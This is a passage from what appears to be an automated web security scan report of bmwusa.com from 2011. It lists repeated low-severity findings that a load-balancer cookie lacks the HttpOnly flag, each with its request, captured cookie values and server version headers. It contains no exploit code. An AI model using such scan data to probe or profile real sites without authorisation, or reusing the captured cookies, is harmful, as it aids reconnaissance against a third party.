Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:14:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:34:30 GMT;path=/
Content-Length: 215521

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.314. http://www.bmwusa.com/standard/content/vehicles/2011/7/750ixdrivesedan/7seriessedanmediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/750ixdrivesedan/7seriessedanmediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:37:28 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/750ixdrivesedan/7seriessedanmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:17:28 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:37:28 GMT;path=/
Content-Length: 202243

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.315. http://www.bmwusa.com/standard/content/vehicles/2011/7/750ixdrivesedan/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/750ixdrivesedan/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:37:48 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/750ixdrivesedan/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:17:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:37:48 GMT;path=/
Content-Length: 212632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.316. http://www.bmwusa.com/standard/content/vehicles/2011/7/750ixdrivesedan/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/750ixdrivesedan/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:34:54 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/750ixdrivesedan/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:14:54 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:34:54 GMT;path=/
Content-Length: 212633

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.317. http://www.bmwusa.com/standard/content/vehicles/2011/7/750ixdrivesedan/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/750ixdrivesedan/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:37:26 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/750ixdrivesedan/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:17:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:37:26 GMT;path=/
Content-Length: 228916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.318. http://www.bmwusa.com/standard/content/vehicles/2011/7/750ixdrivesedan/features_and_specs/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/750ixdrivesedan/features_and_specs/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:36:56 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/750ixdrivesedan/features_and_specs/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:16:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:36:56 GMT;path=/
Content-Length: 228917

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.319. http://www.bmwusa.com/standard/content/vehicles/2011/7/750ixdrivesedan/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/750ixdrivesedan/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:35:41 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/750ixdrivesedan/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:15:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:35:41 GMT;path=/
Content-Length: 217827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.320. http://www.bmwusa.com/standard/content/vehicles/2011/7/750ixdrivesedan/modelhighlights/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/750ixdrivesedan/modelhighlights/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:35:21 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/750ixdrivesedan/modelhighlights/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:15:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:35:21 GMT;path=/
Content-Length: 217828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.321. http://www.bmwusa.com/standard/content/vehicles/2011/7/750lisedan/7seriessedanmediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/750lisedan/7seriessedanmediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:38:04 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/750lisedan/7seriessedanmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:18:04 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:38:04 GMT;path=/
Content-Length: 202313

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.322. http://www.bmwusa.com/standard/content/vehicles/2011/7/750lisedan/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/750lisedan/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:38:20 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/750lisedan/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:18:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:38:20 GMT;path=/
Content-Length: 212884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.323. http://www.bmwusa.com/standard/content/vehicles/2011/7/750lisedan/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/750lisedan/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:39:18 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/750lisedan/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:19:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:39:18 GMT;path=/
Content-Length: 228584

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.324. http://www.bmwusa.com/standard/content/vehicles/2011/7/750lisedan/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/750lisedan/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:39:15 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/750lisedan/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:19:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:39:15 GMT;path=/
Content-Length: 215840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.325. http://www.bmwusa.com/standard/content/vehicles/2011/7/750lixdrivesedan/7seriessedanmediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/750lixdrivesedan/7seriessedanmediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:42:21 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/750lixdrivesedan/7seriessedanmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:22:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:42:21 GMT;path=/
Content-Length: 202223

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.326. http://www.bmwusa.com/standard/content/vehicles/2011/7/750lixdrivesedan/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/750lixdrivesedan/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:43:04 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/750lixdrivesedan/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
